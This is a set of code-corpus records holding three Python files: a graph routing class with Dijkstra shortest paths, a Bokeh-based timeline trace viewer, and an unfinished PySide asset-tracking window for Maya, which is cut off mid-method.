+{"seq_id":"55904352","text":"from .link import Link\nfrom .node import Node\n\nINVALID_VALUE = -1\n\nclass Graph(object):\n def __init__(self, links = [], nodes = []):\n self.cost = {}\n self.links = links\n self.nodes = nodes\n\n self.createCostMatrix()\n\n def addLink(self, node_id_1, node_id_2, weight):\n node1 = Node(node_id_1)\n node2 = Node(node_id_2)\n link = Link(node1, node2, weight)\n self.links.append(link)\n\n # TODO: Como saber a capacidade do link? Por enquanto, está fixa no código.\n # print('node1.id = ', node1.id)\n # print('node2.id = ', node2.id)\n #\n # print('link.node1.id = ', link.node1.id)\n # print('link.node2.id = ', link.node2.id)\n # print('link.weight = ', link.weight)\n #\n # print('cost matrix = ', self.cost)\n # print('cost matrix[link.node1.id] = ', self.cost[link.node1.id])\n # print('cost matrix[link.node2.id] = ', self.cost[link.node2.id])\n\n self.cost[link.node1.id][link.node2.id] = 1/link.weight\n self.cost[link.node2.id][link.node1.id] = 1/link.weight\n\n def containsLink(self, node_id_1, node_id_2):\n for link in self.links:\n if (link.node1.id == node_id_1 and link.node2.id == node_id_2) or (link.node1.id == node_id_2 and link.node2.id == node_id_1):\n return True\n return False\n\n def removeLink(self, node_id_1, node_id_2):\n for link in self.links:\n if (link.node1.id == node_id_1 and link.node2.id == node_id_2) or (link.node1.id == node_id_2 and link.node2.id == node_id_1):\n link_index = self.links.index(link)\n del self.links[link_index]\n\n # TODO: Remover da matriz de adjacencia === Colocar valor inválido\n self.cost[link.node1.id][link.node2.id] = INVALID_VALUE\n self.cost[link.node2.id][link.node1.id] = INVALID_VALUE\n\n def addNode(self, node_id):\n node = Node(node_id)\n self.nodes.append(node)\n self.cost[node_id] = {}\n\n def removeNode(self, node_id):\n for node in self.nodes:\n if node.id == node_id:\n node_index = self.nodes.index(node)\n del self.nodes[node_index]\n\n # TODO: Remover da matriz de adjacencia tb\n\n def containsNodeId(self, node_id):\n for node in self.nodes:\n if node.id == node_id:\n return True\n return False\n\n def createCostMatrix(self):\n if len(self.links) == 0: return\n\n # cost is NxN array of 'foo' (which can depend on i and j if you want)\n self.cost = [[float('inf') for i in range(len(self.nodes))] for j in range(len(self.nodes))]\n\n for link in self.links:\n # Inicializa custo bidirecional\n self.cost[link.node1.id][link.node2.id] = 1 / link.weight\n self.cost[link.node2.id][link.node1.id] = 1 / link.weight\n\n def createDistancesDict(self):\n # Cria dicionário de distâncias de cada nodo até todos os outros\n # distances = {\n # 'B': {'A': 5, 'D': 1, 'G': 2},\n # 'A': {'B': 5, 'D': 3, 'E': 12, 'F' :5},\n # 'D': {'B': 1, 'G': 1, 'E': 1, 'A': 3},\n # 'G': {'B': 2, 'D': 1, 'C': 2},\n # 'C': {'G': 2, 'E': 1, 'F': 16},\n # 'E': {'A': 12, 'D': 1, 'C': 1, 'F': 2},\n # 'F': {'A': 5, 'E': 2, 'C': 16}}\n distances = {}\n for node1 in self.nodes:\n # Percorre a linha\n distances[node1.id] = {}\n for node2 in self.nodes:\n distances[node1.id][node2.id] = self.cost[node1.id][node2.id]\n\n return distances\n\n def updatePathCostMatrix(self, path, consumed_bandwidth):\n # Atualiza as larguras de banda disponiveis de cada link\n for i in range(len(path) - 1):\n item_index_source = path[i]\n item_index_target = path[i+1]\n self.cost[item_index_source][item_index_target] = self.cost[item_index_source][item_index_target] - (1 / consumed_bandwidth)\n\n new_distances = self.createDistancesDict()\n\n print(' - Updated cost')\n self.printCostMatrix()\n print('\\n\\n')\n\n\n def getMinimumCostPath(self, flow):\n # Calcula caminho de custo mínimo, onde o custo de cada caminho é o recíproco\n # da sua capacidade disponível (1/capacidade). Após associar um par de\n # switches a um caminho, atualiza o custo de cada link.\n print('-> Get mininum cost path [Dijkstra] from {0} to {1}\\n'.format(\n flow.source.id, flow.target.id))\n\n min_cost_path = self.dijsktra(flow.source, flow.target)\n print(' - Path found: {0}\\n'.format(min_cost_path))\n\n self.updatePathCostMatrix(min_cost_path, flow.bandwidth)\n\n return min_cost_path\n\n def dijsktra(self, source, target):\n # shortest paths is a dict of nodes whose value is a tuple of (previous node, weight)\n shortest_paths = {source.id: (None, 0)}\n current_node = source.id\n distances = self.createDistancesDict()\n visited = set()\n\n while current_node != target.id:\n visited.add(current_node)\n destinations = distances[current_node]\n weight_to_current_node = shortest_paths[current_node][1]\n\n for next_node in destinations:\n weight = self.cost[current_node][next_node] + weight_to_current_node\n if next_node not in shortest_paths:\n shortest_paths[next_node] = (current_node, weight)\n else:\n current_shortest_weight = shortest_paths[next_node][1]\n if current_shortest_weight > weight:\n shortest_paths[next_node] = (current_node, weight)\n\n next_destinations = {node: shortest_paths[node] for node in shortest_paths if node not in visited}\n\n if len(next_destinations.values()) == 0:\n return \"Route Not Possible\"\n # next node is the destination with the lowest weight\n current_node = min(next_destinations, key=lambda k: next_destinations[k][1])\n\n # Work back through destinations in shortest path\n path = []\n while current_node is not None:\n path.append(current_node)\n next_node = shortest_paths[current_node][0]\n current_node = next_node\n # Reverse path\n path = path[::-1]\n return path\n\n def printCostMatrix(self):\n print('-> Cost matrix:')\n print(self.cost)\n print('\\n')\n\n def printGraph(self):\n for link in self.links:\n print('{node1}-------({weight})-------{node2}'.format(\n node1=link.node1.id,\n weight=link.weight,\n node2=link.node2.id\n ))\n","sub_path":"routing/graphModel/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"149391418","text":"#!/usr/bin/env python3\n\n# Run this script with this command:\n# $ bokeh serve --show ./main.py --args \"trace_file\"\n\nimport sys\nimport collections\nimport random\nimport functools\nimport traceback\nimport math\nimport datetime\nimport pandas\nimport numpy\nimport bokeh.plotting\nimport bokeh.io\nimport bokeh.models\nimport bokeh.models.tickers\nimport bokeh.layouts\nimport bokeh.palettes\nimport bokeh.transform\n\nclass TimelineTraceSlice:\n def __init__(self, df):\n self.__df = df\n self.__df.reset_index(inplace=True, drop=True)\n\n def get_sampled_slice(self, num_samples):\n return TimelineTraceSlice(self.__df.sample(num_samples)\n if self.size() > num_samples else self.__df)\n\n def dataframe(self):\n return self.__df\n\n def size(self):\n return len(self.__df.index)\n\n def add_rank_pos(self, num_conc):\n self.__df = self.__df.assign(\n rank0_pos=self.__df.loc[:, 'rank0']+\n (numpy.mod(self.__df.index, num_conc)+0.5)/num_conc,\n height=1/num_conc)\n self.__df = self.__df.assign(\n rank1_pos=numpy.where(self.__df.loc[:, 'rank0'] == self.__df.loc[:, 'rank1'],\n self.__df.loc[:, 'rank0_pos'],\n self.__df.loc[:, 'rank1']+0.5))\n\nclass TimelineTrace:\n def read_csv(self, input_path):\n COLUMNS = ['rank0', 't0', 'rank1', 't1', 'kind']\n print(\"Reading CSV...\")\n df = pandas.read_csv(input_path, names=COLUMNS)\n\n print(\"Preparing data...\")\n df['duration'] = df['t1']-df['t0']\n self.__columns = df.columns\n self.__time_min = df['t0'].min()\n self.__time_max = df['t1'].max()\n\n df.sort_values('t0', inplace=True)\n df.rename_axis('line', inplace=True)\n\n self.__data = collections.OrderedDict((x for x in df.groupby('kind'))) # workaround\n self.__t1_index = collections.OrderedDict()\n for kind, kind_df in self.__data.items():\n kind_df.reset_index(inplace=True)\n self.__t1_index[kind] = kind_df['t1'].sort_values()\n\n print(\"Trace is loaded.\")\n return self\n\n def get_sampled_time_slice(self, time_range, kinds, num_samples):\n print(\"Making slices...\")\n index_start = numpy.fromiter(\n ((t1_ser.searchsorted(time_range[0]).item() if kind in kinds else 0)\n for kind, t1_ser in self.__t1_index.items()), dtype=int)\n index_end = numpy.fromiter(\n ((kind_df['t0'].searchsorted(time_range[1], 'right').item() if kind in kinds else 0)\n for kind, kind_df in self.__data.items()), dtype=int)\n\n num_list = index_end - index_start\n num_sum_right = num_list.cumsum()\n num_total = num_sum_right[len(num_sum_right)-1] if num_sum_right.size > 0 else 0\n num_sum_left = [(0 if i == 0 else num_sum_right[i-1]) for i in range(len(num_sum_right))]\n\n sampled_idxs = range(num_total)\n if num_total > num_samples:\n sampled_idxs = random.sample(sampled_idxs, num_samples)\n sampled_idxs = numpy.array(sampled_idxs)\n sampled_idxs.sort()\n\n si_left = numpy.searchsorted(sampled_idxs, num_sum_left, 'left')\n si_right = numpy.searchsorted(sampled_idxs, num_sum_right, 'left')\n local_sampled_idxs = [sampled_idxs[l:r]-ns for l, r, ns in zip(si_left, si_right, num_sum_left)]\n\n sub_data = pandas.concat(df.iloc[idx_start+idxs] for df, idx_start, idxs\n in zip(self.__data.values(), index_start, local_sampled_idxs))\n return TimelineTraceSlice(sub_data), num_total\n\n def get_empty_time_slice(self):\n return TimelineTraceSlice(pandas.DataFrame(columns=self.__columns))\n\n def get_time_range(self):\n return self.__time_min, self.__time_max\n\n def get_kinds(self):\n return list(self.__data.keys())\n\nclass TimelineTraceViewer:\n __refreshed = { 'main': True, 'sub': True }\n __slider_values = {\n 'num_main_bar_samples': 10000,\n 'label_rate': 0.0,\n 'num_rt_bar_samples': 10000,\n 'num_conc': 1\n }\n __active_main_tab = 0\n\n def __init__(self, trace):\n print(\"Initializing viewer...\")\n self.__trace = trace\n self.__kinds = self.__trace.get_kinds()\n self.__visible_kinds = set(self.__kinds)\n\n def big_palette(size, palette_func):\n if size < 256:\n return palette_func(size)\n p = palette_func(256)\n colors = []\n for i in range(size):\n idx = int(i * 256.0 / size)\n colors.append(p[idx])\n return colors\n\n kind_colors = big_palette(len(self.__kinds), bokeh.palettes.viridis)\n color_mapper = bokeh.transform.factor_cmap(\n field_name='kind', factors=self.__kinds, palette=kind_colors)\n\n TOOLTIPS = [\n ('line', \"@line\"),\n (\"t\", \"(@t0,@t1)\"),\n (\"duration\", \"@duration\"),\n (\"rank\", \"(@rank0,@rank1)\"),\n (\"kind\", \"@kind\")\n ]\n\n init_time_range = self.__trace.get_time_range()\n self.__main_time_range = init_time_range\n self.__rt_time_range = init_time_range\n\n MainTabInfo = collections.namedtuple(\n 'MainTabInfo', ('fig', 'migration_seg', 'bar_src', 'label_src', 'panel'))\n\n def make_main_tab(tab_num, backend, title, x_range, y_range):\n fig = bokeh.plotting.figure(\n plot_width=1200, plot_height=800,\n x_range=x_range, y_range=y_range,\n tools='hover,xwheel_zoom,ywheel_zoom,xpan,ypan,reset,crosshair,save,help',\n active_drag='xpan', active_scroll='xwheel_zoom',\n tooltips=TOOLTIPS, output_backend=backend)\n\n yticker = bokeh.models.tickers.SingleIntervalTicker(interval=1)\n fig.yaxis.ticker = yticker\n fig.ygrid.grid_line_alpha = 1\n fig.ygrid.grid_line_color = 'black'\n fig.ygrid.ticker = yticker\n\n bar_src, label_src = map(bokeh.models.ColumnDataSource, self.__get_main_data(tab_num))\n\n fig.hbar(\n y='rank0_pos', left=\"t0\", right=\"t1\", height='height', legend='kind',\n color=color_mapper, hover_color=color_mapper, alpha=0.8, hover_alpha=1.0,\n hover_line_color=\"firebrick\", source=bar_src)\n\n migration_seg = fig.segment(\n x0='t1', x1='t1', y0='rank0_pos', y1='rank1_pos',\n color=color_mapper, source=bar_src)\n migration_seg.visible = False\n\n labels = bokeh.models.LabelSet(\n y='rank0_pos', x='t0', text='kind', text_baseline='middle',\n source=label_src, level='glyph', render_mode='canvas')\n fig.add_layout(labels)\n\n panel = bokeh.models.Panel(child=fig, title=title)\n\n return MainTabInfo(fig=fig, migration_seg=migration_seg,\n bar_src=bar_src, label_src=label_src, panel=panel)\n\n webgl_main_tab = make_main_tab(0, 'webgl', \"WebGL\", init_time_range, None)\n webgl_main_tab.fig.x_range.on_change('start', self.__on_change_time_range)\n webgl_main_tab.fig.x_range.on_change('end', self.__on_change_time_range)\n\n svg_main_tab = make_main_tab(\n 1, 'svg', \"SVG\", webgl_main_tab.fig.x_range, webgl_main_tab.fig.y_range)\n\n self.__main_tabs = (webgl_main_tab, svg_main_tab)\n main_tabs = bokeh.models.Tabs(tabs=[ti.panel for ti in self.__main_tabs])\n main_tabs.on_change('active', self.__on_change_main_tab)\n\n init_rt_bar_data = self.__get_rangetool_data(init_time_range)\n self.__rt_bar_src = bokeh.models.ColumnDataSource(init_rt_bar_data)\n\n rt_fig = bokeh.plotting.figure(plot_width=1200, plot_height=150,\n toolbar_location=None, output_backend='webgl')\n\n self.__rt_bar = rt_fig.hbar(y=\"rank0_pos\", left=\"t0\", right=\"t1\", height=0.5,\n color=color_mapper, alpha=0.8, source=self.__rt_bar_src)\n\n range_tool = bokeh.models.RangeTool(x_range=webgl_main_tab.fig.x_range)\n rt_fig.add_tools(range_tool)\n\n self.__sample_info_div = bokeh.models.widgets.Div(text=self.__get_sample_info())\n\n def create_slider(name, **kwargs):\n slider = bokeh.models.widgets.Slider(value=self.__slider_values[name], **kwargs)\n slider.on_change('value', functools.partial(self.__on_change_slider, name))\n return slider\n\n num_main_bar_samples_slider = create_slider('num_main_bar_samples',\n start=1, end=100000, step=1, title=\"# of samples for main plot\")\n\n label_rate_slider = create_slider('label_rate',\n start=0, end=1, step=0.01, title=\"Rate for showing labels\")\n\n num_rt_bar_samples_slider = create_slider('num_rt_bar_samples',\n start=1, end=100000, step=1, title=\"# of samples for sub plot\")\n\n num_conc_slider = create_slider('num_conc',\n start=1, end=30, step=1, title=\"# of concurrent events\")\n\n migrate_checkbox_group = \\\n bokeh.models.widgets.CheckboxGroup(labels=[\"Show migrations\"], active=[])\n migrate_checkbox_group.on_click(self.__on_click_migrate_checkboxes)\n\n kind_all_button = \\\n bokeh.models.widgets.CheckboxButtonGroup(labels=[\"Show all\"], active=[0])\n kind_all_button.on_click(self.__on_click_show_all_kinds)\n\n self.__kind_checkbox_group = \\\n bokeh.models.widgets.CheckboxGroup(\n labels=self.__kinds, active=list(range(len(self.__kinds))))\n self.__kind_checkbox_group.on_click(self.__on_click_kind_checkboxes)\n\n curdoc = bokeh.io.curdoc()\n row = bokeh.layouts.row\n column = bokeh.layouts.column\n left_layout = column(main_tabs, rt_fig)\n right_layout = column(self.__sample_info_div,\n num_main_bar_samples_slider, label_rate_slider,\n num_rt_bar_samples_slider, num_conc_slider,\n migrate_checkbox_group,\n kind_all_button, self.__kind_checkbox_group)\n curdoc.add_root(row(left_layout, right_layout))\n curdoc.add_periodic_callback(self.__on_timer, 100)\n print(\"Viewer is initialized.\")\n\n def __get_main_data(self, tab_num):\n is_active = tab_num == self.__active_main_tab\n bar_sl, num_total = self.__get_sampled_time_slice(\n self.__main_time_range, self.__slider_values['num_main_bar_samples']) \\\n if is_active else self.__get_empty_data()\n if is_active:\n self.__num_main_actual_events = num_total\n\n num_label_samples = math.ceil(bar_sl.size() * self.__slider_values['label_rate'])\n label_sl = bar_sl.get_sampled_slice(num_label_samples)\n return bar_sl.dataframe(), label_sl.dataframe()\n\n def __get_rangetool_data(self, time_range):\n rangetool_sl, _ = self.__get_sampled_time_slice(\n self.__rt_time_range, self.__slider_values['num_rt_bar_samples'])\n return rangetool_sl.dataframe()\n\n def __get_sampled_time_slice(self, time_range, num_samples):\n sl, num_total = self.__trace.get_sampled_time_slice(time_range, self.__visible_kinds, num_samples)\n sl.add_rank_pos(self.__slider_values['num_conc'])\n return sl, num_total\n\n def __get_empty_data(self):\n sl = self.__trace.get_empty_time_slice()\n sl.add_rank_pos(self.__slider_values['num_conc'])\n return sl, 0\n\n def __update_main_data(self):\n for i, ti in enumerate(self.__main_tabs):\n ti.bar_src.data, ti.label_src.data = \\\n map(bokeh.models.ColumnDataSource.from_df, self.__get_main_data(i))\n self.__sample_info_div.text = self.__get_sample_info()\n\n def __update_rangetool_data(self):\n self.__rt_bar_src.data = \\\n bokeh.models.ColumnDataSource.from_df(\n self.__get_rangetool_data(self.__rt_time_range))\n\n def __get_sample_info(self):\n n_actual = self.__num_main_actual_events\n n_limit = self.__slider_values['num_main_bar_samples']\n if n_actual > n_limit:\n msg = \"{:.3f} % sampled\".format(n_limit / n_actual * 100)\n else:\n msg = \"accurate\"\n return \"# of actual events for main plot: {}
\" \\\n \"({})\".format(n_actual, msg)\n\n def __on_change_time_range(self, attr, old, new):\n if attr == 'start':\n self.__main_time_range = (new, self.__main_time_range[1])\n self.__request_refresh_main()\n elif attr == 'end':\n self.__main_time_range = (self.__main_time_range[0], new)\n self.__request_refresh_main()\n\n def __on_change_main_tab(self, attr, old, new):\n self.__active_main_tab = new\n self.__request_refresh_main()\n\n def __on_change_slider(self, name, attr, old, new):\n self.__slider_values[name] = new\n self.__request_refresh_all()\n\n def __on_click_migrate_checkboxes(self, active_list):\n is_visible = 0 in active_list\n for ti in self.__main_tabs:\n ti.migration_seg.visible = is_visible\n\n def __on_click_kind_checkboxes(self, active_list):\n self.__visible_kinds = set(self.__kinds[i] for i in active_list)\n self.__request_refresh_all()\n\n def __on_click_show_all_kinds(self, active_list):\n self.__kind_checkbox_group.active = \\\n list(range(len(self.__kinds))) if 0 in active_list else []\n\n def __request_refresh_main(self):\n self.__refreshed['main'] = False\n\n def __request_refresh_all(self):\n self.__request_refresh_main()\n self.__refreshed['sub'] = False\n\n def __on_timer(self):\n def refresh(plot_name, update_func):\n if not self.__refreshed[plot_name]:\n start_time = datetime.datetime.now()\n print(\"Refreshing {} plot...\".format(plot_name))\n update_func()\n self.__refreshed[plot_name] = True\n end_time = datetime.datetime.now()\n print(\"Refreshed {} plot in {} sec.\"\n .format(plot_name, (end_time-start_time).total_seconds()))\n try:\n refresh('main', self.__update_main_data)\n refresh('sub', self.__update_rangetool_data)\n except:\n # See the trace inside the callback for debugging.\n traceback.print_exc()\n raise\n\ntrace = TimelineTrace()\nif len(sys.argv) < 2:\n sys.exit(\"{} [CSV path]\".format(sys.argv[0]))\ntrace.read_csv(sys.argv[1])\nviewer = TimelineTraceViewer(trace)\n\n","sub_path":"viewer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"138548273","text":"#!/usr/bin/env python\n#coding:utf-8\n# Author: LiYaJun --\n# Purpose: Asset Tracking for Maya\n# Created: 2013/9/11\n\nimport sys,os,shutil\n#from PyQt4.QtCore import *\n#from PyQt4.QtGui import *\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\n#import maya.cmds as mc\n\n#import sip\n#import maya.OpenMayaUI as mui\n\n##----------------------------------------------------------------------\ndef GetMayaWindow():\n #\"\"\"Get the maya main window as a QMainWindow instance\"\"\"\n ptr = mui.MQtUtil.mainWindow()\n return sip.wrapinstance(long(ptr), QObject)\n\n\n\n########################################################################\nclass AssetTracking(QMainWindow):\n \"\"\"AssetTracking for maya\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, parent=None):\n \"\"\"Constructor\"\"\"\n \n super(AssetTracking, self).__init__(parent)\n \n self._files = [] #fileNodes mc.ls(type='file')\n \n self.InitUI()\n \n \n \"\"\"\"\"\"\"\"\"\"\"\"\n #Properties:\n \"\"\"\"\"\"\"\"\"\"\"\"\n #----------------------------------------------------------------------\n def _getFiles(self):\n \"\"\"\"\"\"\n return self._files\n #----------------------------------------------------------------------\n def _setFiles(self,v):\n if isinstance(v, list):\n self._files = v\n Files = property(_getFiles, _setFiles)\n \n \n #----------------------------------------------------------------------\n def InitUI(self):\n \"\"\"init ui\"\"\"\n self.resize(1050, 650)\n self.setWindowTitle(\"Asset Tracking for Maya:: Dev By LiYaJun\")\n \n self.CreateMenu()\n self.CreateMainToolBar()\n self.CollectFileData()\n self.CreateTable()\n self.CreateContextMenu()\n self.statusBar()\n \n #----------------------------------------------------------------------\n def CreateMenu(self):\n \"\"\"init QAction & build main menu\"\"\"\n mainMenu = self.menuBar()\n \n #\n #File\n editMenu = mainMenu.addMenu(\"&File\")\n self.setPath = QAction(\"Set Path...\", self)\n self.setPath.setStatusTip(\"Specify asset path\")\n self.setPath.triggered.connect(self.SetPath)\n editMenu.addAction(self.setPath)\n \n self.browse = QAction(\"Browse...\", self)\n self.browse.setStatusTip(\"Browse image file\")\n self.browse.triggered.connect(self.Browse)\n editMenu.addAction(self.browse)\n \n self.rename = QAction(\"Rename...\", self)\n self.rename.setStatusTip(\"Rename image file and Update shader connection\")\n self.rename.triggered.connect(self.Rename)\n editMenu.addAction(self.rename)\n editMenu.addSeparator()\n #---------------------------\n \n self.copyTo = QAction(\"Copy To...\", self)\n self.copyTo.setStatusTip(\"Copy selected image to...\")\n self.copyTo.triggered.connect(self.CopyTo)\n editMenu.addAction(self.copyTo)\n \n self.moveTo = QAction(\"Move To...\", self)\n self.moveTo.setStatusTip(\"Move selected image to...\")\n self.moveTo.triggered.connect(self.MoveTo)\n editMenu.addAction(self.moveTo)\n editMenu.addSeparator()\n #-----------------------------\n \n self.view = QAction(\"View Image\", self)\n self.view.setStatusTip(\"View selected image\")\n self.view.triggered.connect(self.View)\n editMenu.addAction(self.view)\n \n self.reveal = QAction(\"Reveal in explorer\", self)\n self.reveal.setStatusTip(\"Reveal image file in explorer\")\n self.reveal.triggered.connect(self.Reveal)\n editMenu.addAction(self.reveal)\n editMenu.addSeparator()\n #-----------------------------\n \n self.refresh = QAction(\"Refresh\", self)\n self.refresh.setStatusTip(\"Refresh\")\n self.refresh.triggered.connect(self.Refresh)\n editMenu.addAction(self.refresh)\n \n #\n #Sort\n sortMenu = mainMenu.addMenu(\"So&rt\")\n \n self.sortA2Z = QAction(\"A->Z\", self)\n self.sortA2Z.setStatusTip(\"Sort by A to Z\")\n self.sortA2Z.triggered.connect(self.SortA2Z)\n sortMenu.addAction(self.sortA2Z)\n \n self.sortZ2A = QAction(\"Z->A\", self)\n self.sortZ2A.setStatusTip(\"Sort by Z to A\")\n self.sortZ2A.triggered.connect(self.SortZ2A)\n sortMenu.addAction(self.sortZ2A)\n \n self.sortByExtension = QAction(\"By Type\", self)\n self.sortByExtension.setStatusTip(\"Sort by Type(file extension)\")\n self.sortByExtension.triggered.connect(self.SortByExtension)\n sortMenu.addAction(self.sortByExtension)\n \n self.sortByStatus = QAction(\"By Status\", self)\n self.sortByStatus.setStatusTip(\"Sort by file status\")\n self.sortByStatus.triggered.connect(self.SortByStatus)\n sortMenu.addAction(self.sortByStatus)\n\n #\n #Select\n selByMenu = mainMenu.addMenu(\"&Select\")\n \n self.highLightByObj = QAction(\"HighLight By Object\", self)\n self.highLightByObj.setStatusTip(\"HighLight image file by selected object(geometry)\")\n self.highLightByObj.triggered.connect(self.HighLightByObj)\n selByMenu.addAction(self.highLightByObj)\n \n self.highLightByMat = QAction(\"HighLight By Material\", self)\n self.highLightByMat.setStatusTip(\"HighLight image file by selected material\")\n self.highLightByMat.triggered.connect(self.HighLightByMat)\n selByMenu.addAction(self.highLightByMat)\n \n self.highLightByTex = QAction(\"HighLight By Texture\", self)\n self.highLightByTex.setStatusTip(\"HighLight image file by selected texture(file node)\")\n self.highLightByTex.triggered.connect(self.HighLightByTex)\n selByMenu.addAction(self.highLightByTex)\n selByMenu.addSeparator()\n #-------------------------------------\n \n self.highLightByKeyWord = QAction(\"HighLight By Keyword...\", self)\n self.highLightByKeyWord.setStatusTip(\"HighLight image file by Keyword...(User Input)\")\n self.highLightByKeyWord.triggered.connect(self.HighLightByKeyWord)\n selByMenu.addAction(self.highLightByKeyWord)\n selByMenu.addSeparator()\n #-------------------------------------\n \n self.selectGeometry = QAction(\"Select Geometry\", self)\n self.selectGeometry.setStatusTip(\"Select relevant geometry\")\n self.selectGeometry.triggered.connect(self.SelectGeometry)\n selByMenu.addAction(self.selectGeometry)\n \n self.selectMaterial = QAction(\"Select Material\",self)\n self.selectMaterial.setStatusTip(\"Select relevant material(s)\")\n self.selectMaterial.triggered.connect(self.SelectMaterial)\n selByMenu.addAction(self.selectMaterial)\n \n #----------------------------------------------------------------------\n def CreateContextMenu(self):\n \"\"\"build context menu\"\"\"\n def AddSeparator():\n sp = QAction(self)\n sp.setSeparator(True)\n self.tb.addAction(sp) \n \n self.tb.addAction(self.setPath)\n self.tb.addAction(self.browse)\n self.tb.addAction(self.rename)\n AddSeparator()\n self.tb.addAction(self.copyTo)\n self.tb.addAction(self.moveTo)\n AddSeparator()\n self.tb.addAction(self.view)\n self.tb.addAction(self.reveal)\n \n AddSeparator()\n self.tb.addAction(self.sortA2Z)\n self.tb.addAction(self.sortZ2A)\n self.tb.addAction(self.sortByExtension)\n self.tb.addAction(self.sortByStatus)\n \n AddSeparator()\n self.tb.addAction(self.highLightByObj)\n self.tb.addAction(self.highLightByMat)\n self.tb.addAction(self.highLightByTex)\n AddSeparator()\n self.tb.addAction(self.highLightByKeyWord)\n AddSeparator()\n self.tb.addAction(self.selectGeometry)\n self.tb.addAction(self.selectMaterial) \n \n AddSeparator()\n self.tb.addAction(self.refresh)\n \n self.tb.setContextMenuPolicy(Qt.ActionsContextMenu) \n \n \n #----------------------------------------------------------------------\n def CreateMainToolBar(self):\n \"\"\"build toolBar\"\"\"\n toolBar = self.addToolBar(\"main\")\n \n toolBar.addAction(self.refresh)\n toolBar.addSeparator()\n toolBar.addAction(self.setPath)\n toolBar.addAction(self.browse)\n toolBar.addAction(self.rename)\n toolBar.addSeparator()\n toolBar.addAction(self.copyTo)\n toolBar.addAction(self.moveTo)\n toolBar.addSeparator()\n toolBar.addAction(self.view)\n toolBar.addAction(self.reveal)\n \n #sortToolBar = self.addToolBar(\"sort\")\n toolBar.addSeparator()\n toolBar.addSeparator()\n toolBar.addAction(self.sortA2Z)\n toolBar.addAction(self.sortZ2A)\n toolBar.addAction(self.sortByExtension)\n toolBar.addAction(self.sortByStatus)\n toolBar.addSeparator()\n toolBar.addAction(self.highLightByKeyWord)\n \n selToolBar = self.addToolBar(\"select\")\n selToolBar.addAction(self.highLightByObj)\n selToolBar.addAction(self.highLightByMat)\n selToolBar.addAction(self.highLightByTex)\n selToolBar.addSeparator()\n selToolBar.addAction(self.selectGeometry)\n selToolBar.addAction(self.selectMaterial)\n \n \n #----------------------------------------------------------------------\n def CollectFileData(self):\n \"\"\"Get all fileTextureName\"\"\"\n self.Files = ['c:/avatar.jpg', 'c:/sampledNormals.jpg']\n #self.Files = mc.ls(type='file')\n #self.FileNames = [mc.getAttr('%s.fileTextureName'%f) for f in self.Files]\n #self.FileDict = dict(zip(self.Files, self.FileNames))\n \n #----------------------------------------------------------------------\n def CreateTable(self):\n \"\"\"build table\"\"\"\n \n header = [\"Name\", \"Full Path\", \"Status\", \"Type\", \"File Node\", \"\"]\n \n self.tb = QTableWidget(1000,len(header))\n self.tb.setHorizontalHeaderLabels(header)\n #self.tb.verticalHeader().setVisible(False)\n self.tb.setEditTriggers(QTableWidget.NoEditTriggers)\n self.tb.setSelectionBehavior(QTableWidget.SelectRows)\n \n self.tb.setColumnWidth(0, 200) #Name\n self.tb.setColumnWidth(1, 700) #Full Path\n self.tb.setColumnWidth(2, 50) #Status\n self.tb.setColumnWidth(3, 50) #Type::Extension Name\n self.tb.setColumnWidth(len(header)-1, 1000) #theLast\n \n self.setCentralWidget(self.tb)\n #print(self.tb.rowHeight(0))\n #print(self.tb.columnWidth(0))\n \n for i in range(self.tb.rowCount()):\n self.tb.setRowHeight(i, 20)\n \n if self.Files:\n print(self.Files)\n myTable = MyTable.CreateFromFileNames(self.Files)\n print(myTable)\n for t in myTable:\n print(t)\n \n if self.Files:\n for r in range(len(self.Files)):\n fPath, fName = os.path.split(self.Files[r])\n fType = os.path.splitext(self.Files[r])[-1]\n for c in range(self.tb.columnCount()-1):\n if c == 0: #Name\n self.tb.setItem(r, c, QTableWidgetItem(fName))\n elif c == 1: #Full Path\n self.tb.setItem(r, c, QTableWidgetItem(fPath))\n elif c == 2: #Status\n _status = QTableWidgetItem(\"OK\" if os.path.exists(self.Files[r]) else \"Missing\")\n _status.setTextAlignment(0x0044)\n self.tb.setItem(r, c, _status)\n elif c == 3: #Type\n _type = QTableWidgetItem(fType)\n _type.setTextAlignment(0x0044)\n self.tb.setItem(r, c, _type) \n \n #self.Data = {\"fileA.tga\":[\"c:/fileA/\", True, \".tga\"]}\n #if self.Data:\n #keys = self.Data.keys()\n #values = self.Data.values()\n ##print(values)\n #for r in range(len(self.Data)):\n #for c in range((self.tb.columnCount()-1)):\n ##self.tb.setItem(r, c, QTableWidgetItem((\"%s,%s\"%(data.keys()[r],c))))\n #if c == 0: #Name\n #self.tb.setItem(r, c, QTableWidgetItem(keys[r]))\n #elif c == 1: #Full Path\n #self.tb.setItem(r, c, QTableWidgetItem(values[r][0]))\n #elif c == 2: #Status\n #item = QTableWidgetItem(\"OK\" if values[r][1] else \"Missing\")\n #item.setTextAlignment(0x0044)\n #self.tb.setItem(r, c, item)\n #elif c == 3: #Type\n #item = QTableWidgetItem(os.path.splitext(keys[r])[-1])\n #item.setTextAlignment(0x0044)\n #self.tb.setItem(r, c, item)\n \n #---------------------------------------------------------------------- \n def resizeEvent(self, e):\n pass\n \"\"\"\n changed = e.size() - e.oldSize()\n fullPathColWidth = self.tb.columnWidth(1)\n print(changed.width(), fullPathColWidth)\n if changed.width() > 0 and self.width() > 1000 and fullPathColWidth < self.width():\n self.tb.setColumnWidth(1, (fullPathColWidth + changed.width()))\n elif self.width() < 1000:\n self.tb.setColumnWidth(1, 700)\n \"\"\"\n\n\n \"\"\"\"\"\"\"\"\"\"\"\"\n #Methods:\n \"\"\"\"\"\"\"\"\"\"\"\"\n #----------------------------------------------------------------------\n def SetPath(self):\n \"\"\"set fileNode path\"\"\"\n print('setPath')\n \n if self.tb.selectedItems():\n rows = []\n for i in self.tb.selectionModel().selectedRows():\n rows.append(i.row())\n fd = unicode(QFileDialog.getExistingDirectory())\n print(fd)\n if fd and rows:\n for r in rows:\n self.tb.item(r,1).setText(fd)\n newPath = os.path.join(fd, unicode(self.tb.item(r,0).text()))\n _status = \"OK\" if os.path.exists(newPath) else \"Missing\"\n 